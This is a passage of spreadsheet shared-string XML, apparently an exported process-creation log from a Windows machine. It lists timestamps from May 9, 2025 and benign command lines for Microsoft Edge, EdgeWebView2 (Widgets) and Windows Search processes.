    <t>May 9, 2025 @ 13:27:40.518</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:41.107</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:43.433</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:43.440</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:43.449</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:53.255</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:58.697</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:28:13.169</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:28:34.309</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:28:43.895</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:06.224</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:17.113</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:17.132</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:17.139</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:17.209</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:18.644</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:18.655</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:18.659</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:18.680</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:18.697</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:18.715</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:18.750</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:18.788</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:19.892</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:29.853</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:29.866</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:29.873</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:29.884</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:30.961</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:31.014</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:31.058</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:31.112</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:31.128</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:31.170</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:31.185</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:31.202</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:31.241</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:31.271</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:34.584</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:34.597</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:34.629</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:34.645</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:34.663</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:34.678</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:34.695</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:34.711</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:34.727</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:34.743</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:34.759</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:35.397</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:37.587</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:37.594</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:37.599</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:37.639</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:39.556</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:39.557</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:39.575</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:41.740</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:41.771</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:41.772</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:43.404</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --profile-directory=Default</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:43.999</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:44.003</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:44.107</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:44.135</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:44.163</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:44.202</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:44.203</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:44.589</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:44.590</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:44.594</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:44.660</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:44.661</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=renderer --pdf-upsell-enabled --no-pre-read-main-dll --video-capture-use-gpu-memory-buffer --lang=en-GB --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --time-ticks-at-unix-epoch=-1746793237350476 --launch-time-ticks=549777945 --always-read-main-dll --field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=5472 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:44.664</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=renderer --instant-process --pdf-upsell-enabled --no-pre-read-main-dll --video-capture-use-gpu-memory-buffer --lang=en-GB --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --time-ticks-at-unix-epoch=-1746793237350476 --launch-time-ticks=549801629 --always-read-main-dll --field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=4336 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:44.678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</si>
  <si>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--field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=5788 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:44.721</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=5820 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:45.067</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:29:45.080</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:27.586</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:28.740</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:28.799</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:28.803</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:28.818</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:28.825</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:28.853</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:28.854</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:28.855</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=PooledProcess2 --lang=en-GB --service-sandbox-type=utility --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=5884 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:29.704</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=5172 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:29.867</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:30.106</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:30.140</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:30.144</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:30.147</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:30.154</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:31.167</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:31.193</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:31.195</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:31.249</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:31.268</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:32.853</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:32.939</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.98\\msedgewebview2.exe\" --embedded-browser-webview=1 --webview-exe-name=Widgets.exe --webview-exe-version=525.8401.20.0 --user-data-dir=\"C:\\Users\\Engineer\\AppData\\Local\\Packages\\MicrosoftWindows.Client.WebExperience_cw5n1h2txyewy\\LocalState\\EBWebView\" --noerrdialogs --disk-cache-size=52428800 --edge-webview-is-background --lang=en-GB --mojo-named-platform-channel-pipe=1512.7108.10874855148635877899 /pfhostedapp:bbee653ad5d461f7265ca33b8d62b0b69aeb801d</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:34.444</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.98\\msedgewebview2.exe\" --type=crashpad-handler --user-data-dir=C:\\Users\\Engineer\\AppData\\Local\\Packages\\MicrosoftWindows.Client.WebExperience_cw5n1h2txyewy\\LocalState\\EBWebView /prefetch:4 /pfhostedapp:bbee653ad5d461f7265ca33b8d62b0b69aeb801d --monitor-self-annotation=ptype=crashpad-handler --database=C:\\Users\\Engineer\\AppData\\Local\\Packages\\MicrosoftWindows.Client.WebExperience_cw5n1h2txyewy\\LocalState\\EBWebView\\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=135.0.7049.115 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.98\\msedgewebview2.exe\" --annotation=plat=Win64 \"--annotation=prod=Edge WebView2\" --annotation=ver=135.0.3179.98 --initial-client-data=0x178,0x17c,0x180,0x118,0x188,0x7ffdb0589240,0x7ffdb058924c,0x7ffdb0589258</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:36.091</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\System32\\SearchProtocolHost.exe\" Global\\UsGthrFltPipeMssGthrPipe_S-1-5-21-1228744127-581660863-1459446450-10011_ Global\\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-1228744127-581660863-1459446450-10011 1 -2147483646 \"Software\\Microsoft\\Windows Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\" \"C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\usgthrsvc\" \"DownLevelDaemon\"  \"1\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:39.172</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:39.493</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:39.571</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:39.694</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:39.808</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.98\\msedgewebview2.exe\" --type=gpu-process --noerrdialogs --user-data-dir=\"C:\\Users\\Engineer\\AppData\\Local\\Packages\\MicrosoftWindows.Client.WebExperience_cw5n1h2txyewy\\LocalState\\EBWebView\" --webview-exe-name=Widgets.exe --webview-exe-version=525.8401.20.0 --embedded-browser-webview=1 --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1764,i,12846873438858661319,4125065856273407885,262144 --enable-features=ForceSWDCompWhenDCompFallbackRequired,msAggressiveCacheTrimming,msCustomDataPartition,msWebView2NoTabForScreenShare,msWindowsTaskManager --disable-features=BackForwardCache,BackgroundTabLoadingFromPerformanceManager,CloseOmniboxPopupOnInactiveAreaClick,CollectAVProductsInfo,CollectCodeIntegrityInfo,EnableHangWatcher,FilterAdsOnAbusiveSites,GetWifiProtocol,LoginDetection,PreconnectToSearch,SafetyHub,SegmentationPlatform,SpareRendererForSitePerProcess,Ukm,WebPayments,msAITrackerClassification,msAbydosForWindowlessWV2,msAffirmVirtualCard,msAllowChromeWebstore,msAllowMSAPrtSSOForNonMSAProfile,msApplicationGuard,msAskBeforeClosingMultipleTabs,msAutoToggleAADPrtSSOForNonAADProfile,msAutofillEdgeCoupons,msAutofillEdgeCouponsAutoApply,msAutofillEdgeServiceRequest,msAutomaticTabFreeze,msBrowserSettingsSupported,msCoarseGeolocationService,msDataProtection,msDesktopMode,msDesktopRewards,msDisableVariationsSeedFetchThrottling,msEEProactiveHistory,msETFOffstoreExtensionFileDataCollection,msETFPasswordTheftDNRActionSignals,msEdgeAdPlatformUI,msEdgeAddWebCapturetoCollections,msEdgeAutofillAdvancedSuggestionsBasic,msEdgeAutofillOneClickAutocomplete,msEdgeAutofillSaveGSPR100InDb,msEdgeAutofillShowDeployedPassword,msEdgeAutofillSs,msEdgeBrowserEssentialsShowUpdateSection,msEdgeCloudConfigService,msEdgeCloudConfigServiceV2,msEdgeCohorts,msEdgeCollectionsPrismExperiment1,msEdgeCollectionsPrismOverallMigration,msEdgeComposeNext,msEdgeEnableNurturingFramework,msEdgeEnclavePrefsBasic,msEdgeEnclavePrefsNotification,msEdgeFaviconService,msEdgeHJTelemetry,msEdgeHubAppSkype,msEdgeImageEditorUI,msEdgeLinkDoctor,msEdgeMouseGestureDefaultEnabled,msEdgeMouseGestureSupported,msEdgeNewDeviceFre,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgePDFCMHighlightUX,msEdgePasswordIris,msEdgePasswordIrisSaveBubble,msEdgeProngPersonalization,msEdgeReadingView,msEdgeRose,msEdgeSendTabToSelf,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingPersistentStorage,msEdgeShoppingUI,msEdgeSmartFind,msEdgeSuperDragDefaultEnabled,msEdgeSuperDragDropSupported,msEdgeTipping,msEdgeTranslate,msEdgeUseCaptivePortalService,msEdgeWebContentFilteringFeedback,msEdgeWorkSearchBanner,msEnableCustomJobMemoryLimitsOnXbox,msEnableMIPForPDF,msEnablePdfUpsell,msEnableThirdPartyScanning,msEnableWebSignInCta,msEnableWebToBrowserSignIn,msEndpointDlp,msEntityExtraction,msExtensionTelemetryFramework,msExternalTaskManager,msFileSystemAccessDirectoryIterationBlocklistCheck,msForceBrowserSignIn,msForeignSessionsPage,msGeolocationAccessService,msGeolocationOSLocationPermissionFallback,msGeolocationSQMService,msGeolocationService,msGrowthInfraLaunchSourceLogging,msGuidedSwitchAllowed,msHubPinPersist,msImplicitSignin,msIrm,msIrmv2,msKlarnaVirtualCard,msLoadStatistics,msLogIsEdgePinnedToTaskbarOnLaunch,msMIPCrossTenantPdfViewSupport,msMdatpWebSiteDlp,msNotificationPermissionForPWA,msOnHoverSearchInSidebar,msOpenOfficeDocumentsInWebViewer,msPasswordBreachDetection,msPdfAnnotationsVisibility,msPdfDataRecovery,msPdfDigitalSignatureRead,msPdfFreeText,msPdfFreeTextForCJK,msPdfHighlightMode,msPdfInking,msPdfKeyphraseSupport,msPdfOOUI,msPdfPopupMarkerRenderer,msPdfShare,msPdfSharedLibrary,msPdfTextNote,msPdfTextNoteMoreMenu,msPdfThumbnailCache,msPdfUnderside,msPdfViewRestore,msPersonalizationUMA,msPriceComparison,msPromptDefaultHandlerForPDF,msReactiveSearch,msReadAloud,msReadAloudPdf,msRedirectToShoreline,msRevokeExtensions,msSaasDlp,msShoppingTrigger,msShorelineSearch,msShorelineSearchFindOnPageWebUI,msShowOfflineGameEntrance,msShowReadAloudIconInAddressBar,msShowUXForAADPrtSSOForNonAADProfile,msSuspendMessageForNewSessionWhenHavingPendingNavigation,msSyncEdgeCollections,msTabResourceStats,msTokenizationAutofillInlineEnabled,msTouchMode,msTriggeringSignalGenerator,msUserUnderstanding,msVideoSuperResolutionUI,msWalletBuyNow,msWalletCheckout,msWalletDiagnosticDataLogger,msWalletHubEntry,msWalletHubIntlP3,msWalletPartialCard,msWalletPasswordCategorization,msWalletPasswordCategorizationPlatformExpansion,msWalletTokenizationCardMetadata,msWalletTokenizedAutofill,msWebAssist,msWebAssistHistorySearchService,msWebOOUI,msWindowsUserActivities,msZipPayVirtualCard --variations-seed-version --mojo-platform-channel-handle=1760 /prefetch:2 /pfhostedapp:bbee653ad5d461f7265ca33b8d62b0b69aeb801d</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:39.901</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:39.959</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.98\\msedgewebview2.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir=\"C:\\Users\\Engineer\\AppData\\Local\\Packages\\MicrosoftWindows.Client.WebExperience_cw5n1h2txyewy\\LocalState\\EBWebView\" --webview-exe-name=Widgets.exe --webview-exe-version=525.8401.20.0 --embedded-browser-webview=1 --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1764,i,12846873438858661319,4125065856273407885,262144 --enable-features=ForceSWDCompWhenDCompFallbackRequired,msAggressiveCacheTrimming,msCustomDataPartition,msWebView2NoTabForScreenShare,msWindowsTaskManager --disable-features=BackForwardCache,BackgroundTabLoadingFromPerformanceManager,CloseOmniboxPopupOnInactiveAreaClick,CollectAVProductsInfo,CollectCodeIntegrityInfo,EnableHangWatcher,FilterAdsOnAbusiveSites,GetWifiProtocol,LoginDetection,PreconnectToSearch,SafetyHub,SegmentationPlatform,SpareRendererForSitePerProcess,Ukm,WebPayments,msAITrackerClassification,msAbydosForWindowlessWV2,msAffirmVirtualCard,msAllowChromeWebstore,msAllowMSAPrtSSOForNonMSAProfile,msApplicationGuard,msAskBeforeClosingMultipleTabs,msAutoToggleAADPrtSSOForNonAADProfile,msAutofillEdgeCoupons,msAutofillEdgeCouponsAutoApply,msAutofillEdgeServiceRequest,msAutomaticTabFreeze,msBrowserSettingsSupported,msCoarseGeolocationService,msDataProtection,msDesktopMode,msDesktopRewards,msDisableVariationsSeedFetchThrottling,msEEProactiveHistory,msETFOffstoreExtensionFileDataCollection,msETFPasswordTheftDNRActionSignals,msEdgeAdPlatformUI,msEdgeAddWebCapturetoCollections,msEdgeAutofillAdvancedSuggestionsBasic,msEdgeAutofillOneClickAutocomplete,msEdgeAutofillSaveGSPR100InDb,msEdgeAutofillShowDeployedPassword,msEdgeAutofillSs,msEdgeBrowserEssentialsShowUpdateSection,msEdgeCloudConfigService,msEdgeCloudConfigServiceV2,msEdgeCohorts,msEdgeCollectionsPrismExperiment1,msEdgeCollectionsPrismOverallMigration,msEdgeComposeNext,msEdgeEnableNurturingFramework,msEdgeEnclavePrefsBasic,msEdgeEnclavePrefsNotification,msEdgeFaviconService,msEdgeHJTelemetry,msEdgeHubAppSkype,msEdgeImageEditorUI,msEdgeLinkDoctor,msEdgeMouseGestureDefaultEnabled,msEdgeMouseGestureSupported,msEdgeNewDeviceFre,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgePDFCMHighlightUX,msEdgePasswordIris,msEdgePasswordIrisSaveBubble,msEdgeProngPersonalization,msEdgeReadingView,msEdgeRose,msEdgeSendTabToSelf,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingPersistentStorage,msEdgeShoppingUI,msEdgeSmartFind,msEdgeSuperDragDefaultEnabled,msEdgeSuperDragDropSupported,msEdgeTipping,msEdgeTranslate,msEdgeUseCaptivePortalService,msEdgeWebContentFilteringFeedback,msEdgeWorkSearchBanner,msEnableCustomJobMemoryLimitsOnXbox,msEnableMIPForPDF,msEnablePdfUpsell,msEnableThirdPartyScanning,msEnableWebSignInCta,msEnableWebToBrowserSignIn,msEndpointDlp,msEntityExtraction,msExtensionTelemetryFramework,msExternalTaskManager,msFileSystemAccessDirectoryIterationBlocklistCheck,msForceBrowserSignIn,msForeignSessionsPage,msGeolocationAccessService,msGeolocationOSLocationPermissionFallback,msGeolocationSQMService,msGeolocationService,msGrowthInfraLaunchSourceLogging,msGuidedSwitchAllowed,msHubPinPersist,msImplicitSignin,msIrm,msIrmv2,msKlarnaVirtualCard,msLoadStatistics,msLogIsEdgePinnedToTaskbarOnLaunch,msMIPCrossTenantPdfViewSupport,msMdatpWebSiteDlp,msNotificationPermissionForPWA,msOnHoverSearchInSidebar,msOpenOfficeDocumentsInWebViewer,msPasswordBreachDetection,msPdfAnnotationsVisibility,msPdfDataRecovery,msPdfDigitalSignatureRead,msPdfFreeText,msPdfFreeTextForCJK,msPdfHighlightMode,msPdfInking,msPdfKeyphraseSupport,msPdfOOUI,msPdfPopupMarkerRenderer,msPdfShare,msPdfSharedLibrary,msPdfTextNote,msPdfTextNoteMoreMenu,msPdfThumbnailCache,msPdfUnderside,msPdfViewRestore,msPersonalizationUMA,msPriceComparison,msPromptDefaultHandlerForPDF,msReactiveSearch,msReadAloud,msReadAloudPdf,msRedirectToShoreline,msRevokeExtensions,msSaasDlp,msShoppingTrigger,msShorelineSearch,msShorelineSearchFindOnPageWebUI,msShowOfflineGameEntrance,msShowReadAloudIconInAddressBar,msShowUXForAADPrtSSOForNonAADProfile,msSuspendMessageForNewSessionWhenHavingPendingNavigation,msSyncEdgeCollections,msTabResourceStats,msTokenizationAutofillInlineEnabled,msTouchMode,msTriggeringSignalGenerator,msUserUnderstanding,msVideoSuperResolutionUI,msWalletBuyNow,msWalletCheckout,msWalletDiagnosticDataLogger,msWalletHubEntry,msWalletHubIntlP3,msWalletPartialCard,msWalletPasswordCategorization,msWalletPasswordCategorizationPlatformExpansion,msWalletTokenizationCardMetadata,msWalletTokenizedAutofill,msWebAssist,msWebAssistHistorySearchService,msWebOOUI,msWindowsUserActivities,msZipPayVirtualCard --variations-seed-version --mojo-platform-channel-handle=2032 /prefetch:11 /pfhostedapp:bbee653ad5d461f7265ca33b8d62b0b69aeb801d</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:40.048</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:40.533</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:40.703</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.98\\msedgewebview2.exe\" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --noerrdialogs --user-data-dir=\"C:\\Users\\Engineer\\AppData\\Local\\Packages\\MicrosoftWindows.Client.WebExperience_cw5n1h2txyewy\\LocalState\\EBWebView\" --webview-exe-name=Widgets.exe --webview-exe-version=525.8401.20.0 --embedded-browser-webview=1 --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1764,i,12846873438858661319,4125065856273407885,262144 --enable-features=ForceSWDCompWhenDCompFallbackRequired,msAggressiveCacheTrimming,msCustomDataPartition,msWebView2NoTabForScreenShare,msWindowsTaskManager --disable-features=BackForwardCache,BackgroundTabLoadingFromPerformanceManager,CloseOmniboxPopupOnInactiveAreaClick,CollectAVProductsInfo,CollectCodeIntegrityInfo,EnableHangWatcher,FilterAdsOnAbusiveSites,GetWifiProtocol,LoginDetection,PreconnectToSearch,SafetyHub,SegmentationPlatform,SpareRendererForSitePerProcess,Ukm,WebPayments,msAITrackerClassification,msAbydosForWindowlessWV2,msAffirmVirtualCard,msAllowChromeWebstore,msAllowMSAPrtSSOForNonMSAProfile,msApplicationGuard,msAskBeforeClosingMultipleTabs,msAutoToggleAADPrtSSOForNonAADProfile,msAutofillEdgeCoupons,msAutofillEdgeCouponsAutoApply,msAutofillEdgeServiceRequest,msAutomaticTabFreeze,msBrowserSettingsSupported,msCoarseGeolocationService,msDataProtection,msDesktopMode,msDesktopRewards,msDisableVariationsSeedFetchThrottling,msEEProactiveHistory,msETFOffstoreExtensionFileDataCollection,msETFPasswordTheftDNRActionSignals,msEdgeAdPlatformUI,msEdgeAddWebCapturetoCollections,msEdgeAutofillAdvancedSuggestionsBasic,msEdgeAutofillOneClickAutocomplete,msEdgeAutofillSaveGSPR100InDb,msEdgeAutofillShowDeployedPassword,msEdgeAutofillSs,msEdgeBrowserEssentialsShowUpdateSection,msEdgeCloudConfigService,msEdgeCloudConfigServiceV2,msEdgeCohorts,msEdgeCollectionsPrismExperiment1,msEdgeCollectionsPrismOverallMigration,msEdgeComposeNext,msEdgeEnableNurturingFramework,msEdgeEnclavePrefsBasic,msEdgeEnclavePrefsNotification,msEdgeFaviconService,msEdgeHJTelemetry,msEdgeHubAppSkype,msEdgeImageEditorUI,msEdgeLinkDoctor,msEdgeMouseGestureDefaultEnabled,msEdgeMouseGestureSupported,msEdgeNewDeviceFre,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgePDFCMHighlightUX,msEdgePasswordIris,msEdgePasswordIrisSaveBubble,msEdgeProngPersonalization,msEdgeReadingView,msEdgeRose,msEdgeSendTabToSelf,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingPersistentStorage,msEdgeShoppingUI,msEdgeSmartFind,msEdgeSuperDragDefaultEnabled,msEdgeSuperDragDropSupported,msEdgeTipping,msEdgeTranslate,msEdgeUseCaptivePortalService,msEdgeWebContentFilteringFeedback,msEdgeWorkSearchBanner,msEnableCustomJobMemoryLimitsOnXbox,msEnableMIPForPDF,msEnablePdfUpsell,msEnableThirdPartyScanning,msEnableWebSignInCta,msEnableWebToBrowserSignIn,msEndpointDlp,msEntityExtraction,msExtensionTelemetryFramework,msExternalTaskManager,msFileSystemAccessDirectoryIterationBlocklistCheck,msForceBrowserSignIn,msForeignSessionsPage,msGeolocationAccessService,msGeolocationOSLocationPermissionFallback,msGeolocationSQMService,msGeolocationService,msGrowthInfraLaunchSourceLogging,msGuidedSwitchAllowed,msHubPinPersist,msImplicitSignin,msIrm,msIrmv2,msKlarnaVirtualCard,msLoadStatistics,msLogIsEdgePinnedToTaskbarOnLaunch,msMIPCrossTenantPdfViewSupport,msMdatpWebSiteDlp,msNotificationPermissionForPWA,msOnHoverSearchInSidebar,msOpenOfficeDocumentsInWebViewer,msPasswordBreachDetection,msPdfAnnotationsVisibility,msPdfDataRecovery,msPdfDigitalSignatureRead,msPdfFreeText,msPdfFreeTextForCJK,msPdfHighlightMode,msPdfInking,msPdfKeyphraseSupport,msPdfOOUI,msPdfPopupMarkerRenderer,msPdfShare,msPdfSharedLibrary,msPdfTextNote,msPdfTextNoteMoreMenu,msPdfThumbnailCache,msPdfUnderside,msPdfViewRestore,msPersonalizationUMA,msPriceComparison,msPromptDefaultHandlerForPDF,msReactiveSearch,msReadAloud,msReadAloudPdf,msRedirectToShoreline,msRevokeExtensions,msSaasDlp,msShoppingTrigger,msShorelineSearch,msShorelineSearchFindOnPageWebUI,msShowOfflineGameEntrance,msShowReadAloudIconInAddressBar,msShowUXForAADPrtSSOForNonAADProfile,msSuspendMessageForNewSessionWhenHavingPendingNavigation,msSyncEdgeCollections,msTabResourceStats,msTokenizationAutofillInlineEnabled,msTouchMode,msTriggeringSignalGenerator,msUserUnderstanding,msVideoSuperResolutionUI,msWalletBuyNow,msWalletCheckout,msWalletDiagnosticDataLogger,msWalletHubEntry,msWalletHubIntlP3,msWalletPartialCard,msWalletPasswordCategorization,msWalletPasswordCategorizationPlatformExpansion,msWalletTokenizationCardMetadata,msWalletTokenizedAutofill,msWebAssist,msWebAssistHistorySearchService,msWebOOUI,msWindowsUserActivities,msZipPayVirtualCard --variations-seed-version --mojo-platform-channel-handle=2308 /prefetch:13 /pfhostedapp:bbee653ad5d461f7265ca33b8d62b0b69aeb801d</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:40.714</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:40.801</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:40.850</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:41.458</t>
  </si>
  <si>
